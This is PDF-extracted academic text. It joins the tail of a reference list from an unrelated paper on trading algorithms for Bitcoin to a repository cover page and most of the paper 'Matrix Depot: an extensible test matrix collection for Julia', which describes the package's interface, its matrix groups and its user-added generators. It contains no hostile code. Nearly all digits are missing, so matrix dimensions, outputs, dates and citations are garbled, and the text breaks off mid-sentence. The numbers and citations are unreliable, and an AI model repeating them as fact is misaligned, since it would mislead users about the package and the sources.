http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abbey bs, doukas ja. . is technical analysis profitable forindividual currency traders? the journal of portfolio management ( ): – . ahmad i, schmidt g. . an experimental analysis of online unidirectional conver- sion problem. in: huemer c, lops p, eds. e-commerce and web technologies. berlin: springer berlin heidelberg, – . alessandretti l, elbahrawy a, aiello lm, baronchelli a. . anticipating cryptocurrency prices using machine learning. complexity : doi . / / . baur dg, dichtl h, drobetz w, wendt v-s. . investing in gold market tim- ing or buy-and-hold? international review of financial analysis : doi . /j.irfa. . . . brière m, oosterlinck k, szafarz a. . virtual currency, tangible return: port- folio diversification with bitcoin. journal of asset management ( ): – doi . /jam. . . brock w, lakonishok j, lebaron b. . simple technical trading rules and the stochastic properties of stock returns. the journal of finance ( ): – . chang y-h, jong c-c, wang s-c. . size, trading volume, and the profitability of technical trading. international journal of managerial finance ( ): – . coakley j, marzano m, nankervis j. . how profitable are fx technical trading rules? international review of financial analysis : – doi . /j.irfa. . . . el-yaniv r, fiat a, karp rm, turpin g. . optimal search and one-way trading online algorithms. algorithmica : – . fang j, jacobsen b, qin y. . predictability of the simple technical trading rules: an out-of-sample test. review of financial economics ( ): – doi . /j.rfe. . . . gunasekarage a, power dm. . the profitability of moving average trading rules in south asian stock markets. emerging markets review ( ): – doi . /s - ( ) - . hsu p-h, hsu y-c, kuan c-m. . testing the predictive ability of technical analysis using a new stepwise test without data snooping bias. journal of empirical finance ( ): – doi . /j.jempfin. . . . hsu p-h, taylor mp, wang z. . technical trading: is it still beating the foreign ex- change market? journal of international economics : – doi . /j.jinteco. . . . iqbal j, ahmad i. . optimal online k-min search. euro journal on computational optimization ( ): – . ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / / http://dx.doi.org/ . /j.irfa. . . http://dx.doi.org/ . /jam. . http://dx.doi.org/ . /j.irfa. . . http://dx.doi.org/ . /j.rfe. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.jempfin. . . http://dx.doi.org/ . /j.jinteco. . . http://dx.doi.org/ . /peerj-cs. iqbal j, ahmad i, schmidt g. . can online trading algorithms beat the market? an experimental evaluation. in: rd student conference on operational research. wadern: schloss dagstuhl- leibniz-zentrum fuer informatik. iqbal j, ahmad i, shah a. . competitive algorithms for online conversion problem with interrelated prices. international journal of advanced computer science and applications ( ): – doi . /ijacsa. . . jiang f, tong g, song g. . technical analysis profitability without data snoop- ing bias: evidence from chinese stock market. international review of finance ( ): – doi . /irfi. . kao m-y, tate sr. . on-line difference maximization. siam journal on discrete mathematics ( ): – . menkhoff l, taylor mp. . the obstinate passion of foreign exchange professionals: technical analysis. journal of economic literature ( ): – . mohr e, ahmad i, schmidt g. . online algorithms for conversion problems: a survey. surveys in operations research and management science ( ): – . moore t. . the promise and perils of digital currencies. international journal of critical infrastructure protection ( ): – . nakamoto s. . bitcoin: a peer-to-peer electronic cash system. available at https: //bitcoin.org/bitcoin.pdf . narayanan a, bonneau j, felten e, miller a, goldfeder s. . bitcoin and cryptocur- rency technologies: a comprehensive introduction. princeton: princeton university press. nguyen t, de bodisco c, thaver r. . factors affecting bitcoin price in the cryp- tocurrency market: an empirical study. international journal of business & economics perspectives ( ) – . schmidt g, mohr e, kersch m. . experimental analysis of an online trading algorithm. electronic notes in discrete mathematics : – . schroeder p, dochow r, schmidt g. . optimal solutions for the online time series search and one-way trading problem with interrelated prices and a profit function. computers & industrial engineering : – doi . /j.cie. . . . strobel m, auer br. . does the predictive power of variable moving average rules vanish over time and can we explain such tendencies? international review of economics & finance : – doi . /j.iref. . . . uras n, marchesi l, marchesi m, tonelli r. . forecasting bitcoin closing price series using linear regression and neural networks models. peerj computer science :e doi . /peerj-cs. . wang s, vergne j-p. . buzz factor or innovation potential: what explains cryptocur- rencies returns? plos one ( ):e doi . /journal.pone. . Żbikowski k. . application of machine learning algorithms for bitcoin automated trading. in: ryzko d, gawrysiak p, kryszkiewicz m, rybiński h, eds. machine intelligence and big data in industry. cham: springer international publishing – doi . / - - - - _ . ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /ijacsa. . http://dx.doi.org/ . /irfi. https://bitcoin.org/bitcoin.pdf https://bitcoin.org/bitcoin.pdf http://dx.doi.org/ . /j.cie. . . http://dx.doi.org/ . /j.iref. . . http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /peerj-cs. zhu h, jiang z-q, li s-p, zhou w-x. . profitability of simple technical trading rules of chinese stock exchange indexes. physica a: statistical mechanics and its applications : – doi . /j.physa. . . . ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.physa. . . http://dx.doi.org/ . /peerj-cs. the university of manchester research matrix depot: an extensible test matrix collection for julia doi: . /peerj-cs. document version final published version link to publication record in manchester research explorer citation for published version (apa): zhang, w., & higham, n. (accepted/in press). matrix depot: an extensible test matrix collection for julia. peerj, (e ), - . https://doi.org/ . /peerj-cs. published in: peerj citing this paper please note that where the full-text provided on manchester research explorer is the author accepted manuscript or proof version this may differ from the final published version. if citing, it is advised that you check and use the publisher's definitive version. general rights copyright and moral rights for the publications made accessible in the research explorer are retained by the authors and/or other copyright owners and it is a condition of accessing publications that users recognise and abide by the legal requirements associated with these rights. takedown policy if you believe that this document breaches copyright please refer to the university of manchester’s takedown procedures [http://man.ac.uk/ y bo] or contact uml.scholarlycommunications@manchester.ac.uk providing relevant details, so we can investigate your claim. download date: . apr. https://doi.org/ . /peerj-cs. https://www.research.manchester.ac.uk/portal/en/publications/matrix-depot-an-extensible-test-matrix-collection-for-julia( b af d- - b- b -be ac ).html /portal/nick.higham.html https://www.research.manchester.ac.uk/portal/en/publications/matrix-depot-an-extensible-test-matrix-collection-for-julia( b af d- - b- b -be ac ).html https://doi.org/ . /peerj-cs. submitted december accepted march published april corresponding author nicholas j. higham, nick.higham@manchester.ac.uk academic editor ciro cattuto additional information and declarations can be found on page doi . /peerj-cs. copyright zhang and higham distributed under creative commons cc-by . open access matrix depot: an extensible test matrix collection for julia weijian zhang and nicholas j. higham school of mathematics, university of manchester, manchester, uk abstract matrix depot is a julia software package that provides easy access to a large and diverse collection of test matrices. its novelty is threefold. first, it is extensible by the user, and so can be adapted to include the user’s own test problems. in doing so, it facilitates experimentation and makes it easier to carry out reproducible research. second, it amalgamates in a single framework two different types of existing matrix collections, comprising parametrized test matrices (including hansen’s set of regularization test problems and higham’s test matrix toolbox) and real-life sparse matrix data (giving access to the university of florida sparse matrix collection). third, it fully exploits the julia language. it uses multiple dispatch to help provide a simple interface and, in particular, to allow matrices to be generated in any of the numeric data types supported by the language. subjects algorithms and analysis of algorithms, data science, scientific computing and simulation keywords julia, software package, test matrices, matrix algorithm., test problems introduction in , gregory and karney published a book of test matrices (gregory & karney, ). they stated that ‘‘in order to test the accuracy of computer programs for solving numerical problems, one needs numerical examples with known solutions. the aim of this monograph is to provide the reader with suitable examples for testing algorithms for finding the inverses, eigenvalues, and eigenvectors of matrix.’’ at that time it was common for journal papers to be devoted to introducing and analyzing a particular test matrix or class of matrices, examples being the papers of clement ( ) (in the first issue of siam review), pei ( ) (occupying just a quarter of a page), and gear ( ). today, test matrices remain of great interest, but not for the same reasons as fifty years ago. testing accuracy using problems with known solutions is less common because a reference solution correct to machine precision can usually be computed at higher precision without difficulty. the main uses of test matrices nowadays are for exploring the behavior of mathematical quantities (such as eigenvalue bounds) and for measuring the performance of one or more algorithms with respect to accuracy, stability, convergence rate, speed, or robustness. various collections of matrices have been made available in software. as well as giving easy access to matrices these collections have the advantage of facilitating reproducibility of experiments (donoho & stodden, ), whether by the same researcher months later or by different researchers. how to cite this article zhang and higham ( ), matrix depot: an extensible test matrix collection for julia. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:nick.higham@manchester.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. the university of florida sparse matrix collection is to be renamed as the suitesparse matrix collection. an early collection of parametrizable matrices was given by higham ( ) and made available in matlab form. the collection was later extended and distributed as a matlab toolbox (higham, ). many of the matrices in the toolbox were subsequently incorporated into the matlab gallery function. marques, vömel, demmel, and parlett (marques et al., ) present test matrices for tridiagonal eigenvalue problems (already recognized as important by gregory and karney, who devoted the last chapter of their book to such matrices). the harwell–boeing collection of sparse matrices (duff, grimes & lewis, ) has been widely used, and is incorporated in the university of florida sparse matrix collection (davis & hu, ), which contains over matrices from practical applications, including standard and generalized eigenvalue problems from bai et al. ( ). among other matlab toolboxes we mention the contest toolbox (taylor & higham, ), which produces adjacency matrices describing random networks, and the nlevp collection of nonlinear eigenvalue problems (betcke et al., ). the purpose of this work is to provide a test matrix collection for julia (bezanson et al., ; bezanson et al., ), a new dynamic programming language for technical computing. the collection, called matrix depot, exploits julia’s multiple dispatch features to enable all matrices to be accessed by one simple interface. moreover, matrix depot is extensible. users can add matrices from the university of florida sparse matrix collection and matrix market; they can code new matrix generators and incorporate them into matrix depot; and they can define new groups of matrices that give easy access to subsets of matrices. the parametrized matrices can be generated in any appropriate numeric data type, such as • floating-point types float (half precision: bits), float (single precision: bits), and float (double precision: bits); • integer types int (signed -bit integers), uint (unsigned -bit integers), int (signed -bit integers), and uint (unsigned -bit integers); • complex, where the real and imaginary parts are of any real type (the same for both); • rational (ratio of integers); and • arbitrary precision type bigfloat (with default precision bits), which uses the gnu mpfr library (fousse et al., ). this paper is organized as follows. we start by giving a brief demonstration of matrix depot in ‘a taste of matrix depot.’ then we explain the design and implementation of matrix depot in ‘package design and implementation,’ giving details on how multiple dispatch is exploited; how the collection is stored, accessed, and documented; and how it can be extended. in ‘the matrices’ we describe the two classes of matrices in matrix depot: parametrized test matrices and real-life sparse matrix data. concluding remarks are given in the final section. zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. a taste of matrix depot to download matrix depot, in a julia repl (read-eval-print loop) run the command > pkg.add("matrixdepot") then import matrix depot into the local scope. > using matrixdepot now the package is ready to be used. first, we find out what matrices are in matrix depot. > matrixdepot() matrices: ) baart ) binomial ) blur ) cauchy ) chebspec ) chow ) circul ) clement ) companion ) deriv ) dingdong ) fiedler ) forsythe ) foxgood ) frank ) golub ) gravity ) grcar ) hadamard ) hankel ) heat ) hilb ) invhilb ) invol ) kahan ) kms ) lehmer ) lotkin ) magic ) minij ) moler ) neumann ) oscillate ) parallax ) parter ) pascal ) pei ) phillips ) poisson ) prolate ) randcorr ) rando ) randsvd ) rohess ) rosser ) sampling ) shaw ) spikes ) toeplitz ) tridiag ) triw ) ursell ) vand ) wathen ) wilkinson ) wing groups: all data eigen ill-cond inverse pos-def random regprob sparse symmetric all the matrices and groups in the collection are shown. it is also possible to obtain just the list of matrix names. > matrixdepot("all") -element array{asciistring, }: "baart" "binomial" "blur" "cauchy" "chebspec" "chow" "circul" "clement" "companion" "deriv " ... "spikes" "toeplitz" "tridiag" "triw" "ursell" "vand" "wathen" zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. "wilkinson" "wing" here, ‘‘ ...’’ denotes that we have omitted some of the output in order to save space. next, we check the input options of the hilbert matrix hilb. > matrixdepot("hilb") hilbert matrix ================ the hilbert matrix has (i,j) element /(i+j- ). it is notorious for being ill conditioned. it is symmetric positive definite and totally positive. input options: * [type,] dim: the dimension of the matrix. * [type,] row_dim, col_dim: the row and column dimensions. groups: ["inverse", "ill-cond", "symmetric", "pos-def"] references: m. d. choi, tricks or treats with the hilbert matrix, amer. math. monthly, ( ), pp. - . n. j. higham, accuracy and stability of numerical algorithms, second edition, society for industrial and applied mathematics, philadelphia, pa, usa, ; sec. . . note that an optional first argument type can be given; it defaults to float . the string of equals signs on the third line in the output above is markdown notation for a header. julia interprets markdown within documentation, though as we are using typewriter font for code examples here, we display the uninterpreted source. we generate a × hilbert matrix with elements in the default double precision type and then in rational type. > matrixdepot("hilb", , ) x array{float , }: . . . . . . . . . . . . . . . . . . . . . . . . > matrixdepot("hilb", rational, , ) x array{rational{t<:integer}, }: // // // // // // // // // // // // // // // // // // // // // // // // a list of all the symmetric matrices in the collection is readily obtained. > matrixdepot("symmetric") -element array{asciistring, }: "cauchy" zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. "circul" "clement" "dingdong" "fiedler" "hankel" "hilb" "invhilb" "kms" "lehmer" "minij" "moler" "oscillate" "pascal" "pei" "poisson" "prolate" "randcorr" "tridiag" "wathen" "wilkinson" here, symmetric is one of several predefined groups, and multiple groups can be intersected. for example, the for loop below prints the smallest and largest eigenvalues of all the × matrices in matrix depot that are symmetric positive definite and (potentially) ill conditioned. > for name in matrixdepot("symmetric", "pos-def", "ill-cond") a = full(matrixdepot(name, )) @printf " name eigmin(a) eigmax(a) end cauchy: smallest eigval = . e- , largest eigval = . e- hilb: smallest eigval = . e- , largest eigval = . e+ invhilb: smallest eigval = . e- , largest eigval = . e+ kms: smallest eigval = . e- , largest eigval = . e+ moler: smallest eigval = . e- , largest eigval = . e+ oscillate: smallest eigval = . e- , largest eigval = . e+ pascal: smallest eigval = . e- , largest eigval = . e+ pei: smallest eigval = . e+ , largest eigval = . e+ tridiag: smallest eigval = . e- , largest eigval = . e+ matrices can also be accessed by number within the alphabetical list of matrix names. > matrixdepot( ) "binomial" > matrixdepot( : ) -element array{abstractstring, }: "binomial" "blur" "cauchy" "chebspec" > matrixdepot( : , , , : ) -element array{abstractstring, }: "frank" "golub" "gravity" "grcar" zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. "hadamard" "hankel" "chebspec" "chow" "baart" "binomial" "blur" access by number provides a convenient way to run a test on subsets of matrices in the collection. however, the number assigned to a matrix may change if we include new matrices in the collection. in order to run tests in a way that is repeatable in the future it is best to group matrices into subsets using the macro @addgroup, which stores them by name. for example, the following command will group test matrices frank, golub, gravity, grcar, hadamard, hankel, chebspec, chow, baart, binomial, and blur into test . > @addgroup test = matrixdepot( : , , , : ) after reloading the package, we can run tests on these matrices using group test . here we compute the -norms. since blur (an image deblurring test problem) generates a sparse matrix and the matrix -norm is currently not implemented for sparse matrices in julia, we use full to convert the matrix to dense format. > for name in matrixdepot("test ") a = full(matrixdepot(name , )) @printf "\% s has -norm \% . e \n" name norm(a) end baart has -norm . e+ binomial has -norm . e+ blur has -norm . e- chebspec has -norm . e+ chow has -norm . e+ frank has -norm . e+ golub has -norm . e+ gravity has -norm . e+ grcar has -norm . e+ hadamard has -norm . e+ hankel has -norm . e+ to download the test matrix snap/web-google from the university of florida sparse matrix collection (see ‘matrix data from external sources’ for more details), we first download the data with > matrixdepot("snap/web-google", :get) and then generate the matrix with > matrixdepot("snap/web-google", :r) x sparse matrix with float entries: [ , ] = . [ , ] = . [ , ] = . [ , ] = . zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. [ , ] = . [ , ] = . [ , ] = . ... [ , ] = . [ , ] = . [ , ] = . [ , ] = . [ , ] = . [ , ] = . [ , ] = . [ , ] = . note that the omission marked ‘‘ ...’’ was in this case automatically done by julia based on the height of the terminal window. matrices loaded in this way are inserted into the list of available matrices, and assigned a number. after downloading further matrices hb/ _bus, hb/ _bus, and bova/rma the list of matrices is as follows. julia> matrixdepot() matrices: ) baart ) binomial ) blur ) cauchy ) chebspec ) chow ) circul ) clement ) companion ) deriv ) dingdong ) fiedler ) forsythe ) foxgood ) frank ) golub ) gravity ) grcar ) hadamard ) hankel ) heat ) hilb ) invhilb ) invol ) kahan ) kms ) lehmer ) lotkin ) magic ) minij ) moler ) neumann ) oscillate ) parallax ) parter ) pascal ) pei ) phillips ) poisson ) prolate ) randcorr ) rando ) randsvd ) rohess ) rosser ) sampling ) shaw ) spikes ) toeplitz ) tridiag ) triw ) ursell ) vand ) wathen ) wilkinson ) wing ) bova/rma ) hb/ _bus ) hb/ _bus ) snap/web-google groups: all data eigen ill-cond inverse pos-def random regprob sparse symmetric test package design and implementation in this section we describe the design and implementation of matrix depot, focusing particularly on the novel aspects of exploitation of multiple dispatch, extensibility of the collection, and user-definable grouping of matrices. exploiting multiple dispatch matrix depot makes use of multiple dispatch in julia, an object-oriented paradigm in which the selection of a function implementation is based on the types of each argument of the function. the generic function matrixdepot has eight different methods, where each method itself is a function that handles a specific case. this is neater and more convenient than writing eight ‘‘case’’ statements, as is necessary in many other languages. zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. > methods(matrixdepot) # methods for generic function "matrixdepot": matrixdepot() ... matrixdepot(name::abstractstring) ... matrixdepot(name::abstractstring, method::symbol) ... matrixdepot(props::abstractstring...) ... matrixdepot(name::abstractstring, args...) ... matrixdepot(num::integer) ... matrixdepot(ur::unitrange{t<:real}) ... matrixdepot(vs::union{integer,unitrange{t<:real}}...) ... for example, the following two functions are used for accessing matrices by number and range respectively, where matrix_name_list() returns a list of matrix names. the second function calls the first function in the inner loop. function matrixdepot(num::integer) matrixstrings = matrix_name_list() n = length(matrixstrings) if num > n error("there are $(n) parameterized matrices, but you asked for the $(num)-th.") end return matrixstrings[num] end function matrixdepot(ur::unitrange) matrixnamelist = abstractstring[] for i in ur push!(matrixnamelist, matrixdepot(i)) end return matrixnamelist end as a result, matrixdepot is a versatile function that can be used for a variety of purposes, including returning matrix information and generating matrices from various input parameters. in the following example we see how multiple dispatch handles different numbers and types of arguments for the cauchy matrix. > matrixdepot("cauchy") cauchy matrix ============= given two vectors x and y, the (i,j) entry of the cauchy matrix is /(x[i]+y[j]). input options: * [type,] x, y: two vectors. * [type,] x: a vector. y defaults to x. * [type,] dim: the dimension of the matrix. x and y default to [ :dim;]. groups: ["inverse", "ill-cond", "symmetric", "pos-def"] zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. references: n. j. higham, accuracy and stability of numerical algorithms, second edition, society for industrial and applied mathematics, philadelphia, pa, usa, ; sec. . > matrixdepot("cauchy", [ , , ], [ , , ]) x array{float , }: . . . . . . . . . > matrixdepot("cauchy", [ . , . , . ]) x array{float , }: . . . . . . . . . > matrixdepot("cauchy", ) x array{float , }: . . . . . . . . . > matrixdepot("cauchy", float , ) x array{float , }: . . . . . . . . . multiple dispatch is also exploited in programming the matrices. for example, the hilbert matrix is implemented as function hilb{t}(::type{t}, m::integer, n::integer) h = zeros(t, m, n) for j = :n, i = :m @inbounds h[i,j] = one(t)/ (i + j - one(t)) end return h end hilb{t}(::type{t}, n::integer) = hilb(t, n, n) hilb(args...) = hilb(float , args...) the function hilb has three methods, which enable one to request, for example, hilb( , ) for a × hilbert matrix of type float , or simply (thanks to the final two lines) hilb( ) for a × hilbert matrix of type float . the keyword @inbounds tells julia to turn off bounds checking in the following expression, in order to speed up execution. note that in julia it is not necessary to vectorize code to achieve good performance (bezanson et al., ). all the matrices in matrix depot can be generated using the function call matrixdepot("matrix_name", p , p , ...), where matrix_name is the name of the test matrix, and p , p , ..., are input arguments depending on matrix_name. the help comments for each matrix can be viewed by zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. calling function matrixdepot("matrix_name"). we can access the list of matrix names by number, range, or a mixture of numbers and range. . matrixdepot(i)returns the name of the ith matrix; . matrixdepot(i:j)returns the names of the ith to jth matrices, where i < j; . matrixdepot(i:j, k, m)returns the names of the ith, (i+ )st, ..., jth, kth, and mth matrices. matrix representation matrix names in matrix depot are represented by julia strings. for example, the cauchy matrix is represented by "cauchy". matrix names and matrix groups are stored as hash tables (dict). in particular, there is a hash table matrixdict that maps each matrix name to its underlying function and a hash table matrixclass that maps each group to its members. the majority of parametrized matrices are dense matrices of type array{t, }, where t is the element type of the matrix. variables of the array type are stored in column-major order. a few matrices are stored as sparse matrices (see also matrixdepot("sparse")), in the compressed sparse column (csc) format; these include neumann (a singular matrix from the discrete neumann problem) and poisson (a block tridiagonal matrix from poisson’s equation). tridiagonal matrices are stored in the built-in julia type tridiagonal, which is defined as follows. immutable tridiagonal{t} <: abstractmatrix{t} dl::vector{t} # sub-diagonal d::vector{t} # diagonal du::vector{t} # sup-diagonal du ::vector{t} # supsup-diagonal for pivoting end matrix groups a group is a subset of matrices in matrix depot. there are ten predefined groups, described in table , most of which identify matrices with particular properties. each group is represented by a string. for example, the group of random matrices is represented by "random". matrices can be accessed by group names, as was illustrated in ‘a taste of matrix depot.’ the macro @addgroup is used to add a new group of matrices to matrix depot and the macro @rmgroup removes an added group. all the predefined matrix groups are stored in the hash table matrixclass. the macro addgroup essentially adds a new key-value combination to the hash table usermatrixclass. using a separate hash table prevents the user from contaminating the predefined matrix groups. being able to create groups is a useful feature for reproducible research (donoho & stodden, ). for example, if we have implemented algorithm alg and we used circul, minij, and grcar as test matrices for alg , we could type > @addgroup alg _group = ["circul", "minij", "grcar"] zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table predefined groups. group description all all the matrices in the collection. data the matrix has been downloaded from the university of florida sparse collection or the matrix market collection. eigen part of the eigensystem of the matrix is explicitly known. ill-cond the matrix is ill-conditioned for some parameter values. inverse the inverse of the matrix is known explicitly. pos-def the matrix is positive definite for some parameter values. random the matrix has random entries. regprob the output is a test problem for regularization methods. sparse the matrix is sparse. symmetric the matrix is symmetric for some parameter values. this adds a new group to matrix depot (we need to reload the package to see the changes). julia> matrixdepot() matrices: ) baart ) binomial ) blur ) cauchy ) chebspec ) chow ) circul ) clement ) companion ) deriv ) dingdong ) fiedler ) forsythe ) foxgood ) frank ) golub ) gravity ) grcar ) hadamard ) hankel ) heat ) hilb ) invhilb ) invol ) kahan ) kms ) lehmer ) lotkin ) magic ) minij ) moler ) neumann ) oscillate ) parallax ) parter ) pascal ) pei ) phillips ) poisson ) prolate ) randcorr ) rando ) randsvd ) rohess ) rosser ) sampling ) shaw ) spikes ) toeplitz ) tridiag ) triw ) ursell ) vand ) wathen ) wilkinson ) wing groups: all data eigen ill-cond inverse pos-def random regprob sparse symmetric alg _group we can then run alg on the test matrices by > for name in matrixdepot(alg _group) a = matrixdepot(name, n) # n is the dimension of the matrix. @printf "test result for end adding new matrix generators generators are julia functions that generate test matrices. when matrix depot is first loaded, a directory mymatrixdepot is created. it contains two files, group.jl and generator.jl, where group.jl is used for storing all the user-defined groups (see ‘matrix group’) and generator.jl is used for storing generator declarations. zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. git is a free and open source distributed version control system. julia packages are simply git repositories. the directory mymatrixdepot is untracked by git, so any local changes to files in mymatrixdepot do not make the matrixdepot package ‘‘dirty.’’ in particular, all the newly defined groups or matrix generators will not be affected when we upgrade to a new version of matrix depot. matrix depot automatically loads all julia files in mymatrixdepot. this feature allows a user to simply drop generator files into mymatrixdepot without worrying about how to link them to matrix depot. anewgeneratorisdeclaredusingthesyntaxinclude_generator(functionname, "fname", f). this adds the new mapping "fname" → f to the hash table matrixdict, which we recall maps each matrix name to its underlying function. matrix depot will refer to function f using string "fname" so that we can call function f by matrixdepot("fname"...). the user is free to define new data types and return values of those types. moreover, as with any julia function, multiple values can be returned by listing them after the return statement. for example, suppose we have the following julia file rand.jl, which contains two generators randsym and randorth and we want to use them from matrix depot. the triple quotes in the file delimit the documentation for the functions. """ random symmetric matrix ======================= input options: * n: the dimension of the matrix """ function randsym(n) a = zeros(n, n) for j = :n for i = :j a[i,j] = randn() if i != j; a[j,i] = a[i,j] end end end return a end """ random orthogonal matrix ======================== input options: * n: the dimension of the matrix """ randorth(n) = qr(randn(n,n))[ ] we can copy the file rand.jl to the directory mymatrixdepot and add the following two lines to generator.jl. include_generator(functionname, "randsym", randsym) include_generator(functionname, "randorth", randorth) zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. this includes the functions randsym and randorth in matrix depot, as we can see by looking at the matrix list (the new entries are numbered and ). julia> matrixdepot() matrices: ) baart ) binomial ) blur ) cauchy ) chebspec ) chow ) circul ) clement ) companion ) deriv ) dingdong ) fiedler ) forsythe ) foxgood ) frank ) golub ) gravity ) grcar ) hadamard ) hankel ) heat ) hilb ) invhilb ) invol ) kahan ) kms ) lehmer ) lotkin ) magic ) minij ) moler ) neumann ) oscillate ) parallax ) parter ) pascal ) pei ) phillips ) poisson ) prolate ) randcorr ) rando ) randorth ) randsvd ) randsym ) rohess ) rosser ) sampling ) shaw ) spikes ) toeplitz ) tridiag ) triw ) ursell ) vand ) wathen ) wilkinson ) wing groups: all data eigen ill-cond inverse pos-def random regprob sparse symmetric the new generators can be used just like the built-in ones. > matrixdepot("randsym") random symmetric matrix ======================= input options: * n: the dimension of the matrix > matrixdepot("randsym", ) x array{float , }: - . . - . - . . . . . - . . - . - . - . . - . - . > matrixdepot("randorth") random orthogonal matrix ======================== input options: * n: the dimension of the matrix > a = matrixdepot("randorth", ) x array{float , }: - . . . - . - . - . - . - . . . - . - . - . . . . > a’*a - eye( , ) x array{float , }: - . e- . e- - . e- - . e- zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . e- - . e- - . e- . e- - . e- - . e- - . e- . e- - . e- . e- . e- . we can also add group information with the function include_generator. the following lines are put in generator.jl. include_generator(group, "random", randsym) include_generator(group, "random", randorth) this adds the functions randsym and randorth to the group random, as we can see with the following query (after reloading the package). > matrixdepot("random") -element array{asciistring, }: "golub" "oscillate" "randcorr" "rando" "randorth" "randsvd" "randsym" "rohess" "rosser" "wathen" documentation the matrix depot documentation is created using the documentation generator sphinx (http://sphinx-doc.org/) and is hosted at read the docs (http://matrixdepotjl.readthedocs. org). its primary goals are to provide examples of usage of matrix depot and to give a brief summary of each matrix in the collection. matrices are listed alphabetically with hyperlinks to the documentation for each matrix. most parametrized matrices are presented with heat map plots, which are produced using the winston package (https://github.com/nolta/winston.jl), with the color range determined by the smallest and largest entries of the matrix. for example, fig. shows how the wathen matrix is documented in matrix depot. the matrices we now describe the matrices that are provided with, or can be downloaded into, matrix depot. parametrized matrices in matrix depot v . . , there are parametrized matrices (including the regu- larization problems described in the next section), most of which originate from the test matrix toolbox (higham, ). all these matrices can be generated as matrixdepot("matrix_name", n), where n is the dimension of the matrix. many matrices can have more than one input parameter, and multiple dispatch provides a convenient mechanism for taking different actions for different argument types. for zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://sphinx-doc.org/ http://matrixdepotjl.readthedocs.org http://matrixdepotjl.readthedocs.org https://github.com/nolta/winston.jl http://dx.doi.org/ . /peerj-cs. figure documentation for the wathen matrix. example, the tridiag function generates a tridiagonal matrix from vector arguments giving the subdiagonal, diagonal, and superdiagonal vectors, but a tridiagonal toeplitz matrix can be obtained by supplying scalar arguments that specify the dimension of the matrix, the subdiagonal, the diagonal, and the superdiagonal. if a single, scalar argument n is supplied then an n-by- n tridiagonal toeplitz matrix with subdiagonal and superdiagonal − and diagonal is constructed. this matrix arises in applying central differences to a second derivative operator, and the inverse and the condition number are known explicitly (higham, , sec. . ). here is an example of the different usages of tridiag. > matrixdepot("tridiag") tridiagonal matrix ==================== construct a tridiagonal matrix of type tridiagonal. zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. input options: * [type,] v , v , v : v and v are vectors of subdiagonal and superdiagonal elements, respectively, and v is a vector of diagonal elements. * [type,] dim, x, y, z: dim is the dimension of the matrix, x, y, z are scalars. x and z are the subdiagonal and superdiagonal elements, respectively, and y is the diagonal elements. * [type,] dim: x = - , y = , z = - . this matrix is also known as the second difference matrix. groups: ["inverse", "ill-cond", "pos-def", "eigen"] references: j. todd, basic numerical mathematics, vol. : numerical algebra, birkhauser, basel, and academic press, new york, , p. . > matrixdepot("tridiag", [ , , ;], ones( ), [ , , ;]) x tridiagonal{float }: . . . . . . . . . . . . . . . . > matrixdepot("tridiag", , , , ) x tridiagonal{float }: . . . . . . . . . . . . . . . . > matrixdepot("tridiag", int, ) x tridiagonal{int }: - - - - - - test problems for regularization methods a mathematical problem is ill-posed if the solution is not unique or if an arbitrarily small perturbation of the data can cause an arbitrarily large change in the solution. regularization methods are an important class of methods for dealing with such problems (hansen, ; hansen, ). one means of generating test problems for regularization methods is to discretize a given ill-posed problem. matrix depot contains a group of regularization test problems derived from hansen’s matlab regularization tools (hansen, ; hansen, ; hansen, ) that are mostly discretizations of fredholm integral equations of the first kind:∫ k(s,t)f (t)dt =g(s), ≤ s≤ . zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the regularization test problems form the group regprob. > matrixdepot("regprob") -element array{asciistring, }: "baart" "blur" "deriv " "foxgood" "gravity" "heat" "parallax" "phillips" "shaw" "spikes" "ursell" "wing" each problem is a linear system ax =b where the matrix a and vectors x and b are obtained by discretization (using quadrature or the galerkin method) of k , f , and g. by default, we generate only a, which is an ill-conditioned matrix. the whole test problem will be generated if the parameter matrixonly is set to false, and in 